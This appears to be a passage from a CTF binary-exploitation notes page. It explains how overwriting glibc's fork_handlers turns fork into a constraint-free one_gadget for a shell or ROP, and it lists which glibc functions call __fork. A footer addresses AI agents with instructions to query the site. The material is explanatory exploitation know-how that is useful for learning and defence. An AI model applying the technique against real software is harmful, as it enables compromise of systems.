It can be quite cumbersome to check the disassembly to see what the arguments are going to be ahead of time. That's why I wrote a script, just like with [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md#detecting-this-behaviour), which will trace `fork` with `angr`, and log what the arguments to each call to `prepare_handler` were.

{% embed url="<https://gist.github.com/sasha-999/4feff0af21c4d028fd5701e8f11f12c0>" %}
`detect_fork.py`
{% endembed %}

## fork -> one\_gadget

So why would we care about this? I mean sure, we can control `fork` to either execute `system` for a shell, or `setcontext` for ROP/shellcode, but that's only useful is there are calls to `fork`. Not all applications will use `fork` after all.

What about functions in glibc? Surely some of them will use `fork`, after all there's functions like `system` which would create a new process to execute a shell command, right?

Well unfortunately not many glibc functions use `__libc_fork`.

<figure><img src="/files/yxVH2KBxUscvx5scKMCD" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/A/ident/__fork">Uses of __fork</a></p></figcaption></figure>

* [forkpty](https://elixir.bootlin.com/glibc/glibc-2.39/source/login/forkpty.c#L34)
* [grantpt](https://elixir.bootlin.com/glibc/glibc-2.39/source/sysdeps/unix/grantpt.c#L207)
* [daemon](https://elixir.bootlin.com/glibc/glibc-2.39/source/misc/daemon.c#L48)
* [\_IO\_old\_popen](https://elixir.bootlin.com/glibc/glibc-2.39/source/libio/oldiopopen.c#L91) (not used)
* [vfork](https://elixir.bootlin.com/glibc/glibc-2.39/source/posix/vfork.c#L26) (if the `vfork` syscall doesn't exist)

The rest, like `system` or `popen` will use an inlined `clone` call.

<figure><img src="/files/s5yDWqB5pK3y4oRICHwO" alt=""><figcaption><p><a href="https://elixir.bootlin.com/glibc/glibc-2.39/source/sysdeps/unix/sysv/linux/spawni.c#L415">__spawnix</a>: Used by <code>system</code></p></figcaption></figure>

Well, like I mentioned in the beginning, by overwriting `fork_handlers`, we effectively have turned `fork` into a `one_gadget`. However, this has a few benefits over a regular `one_gadget`:

* No constraints.
* Can trigger ROP.

So if you have a function call primitive, and don't have strong argument control, but can use an arbitrary write, this may be useful.

However, a lot of what's been done here can also be done with `exit`, and easier as well, as that has explicit argument control, the only downside there is that you have to deal with pointer mangling too.

In conclusion, there may be some cases where this can be useful, but even if this is never used, I still think it was interesting, and I hope you did too :)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://sashactf.gitbook.io/pwn-notes/pwn/fork_gadget.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
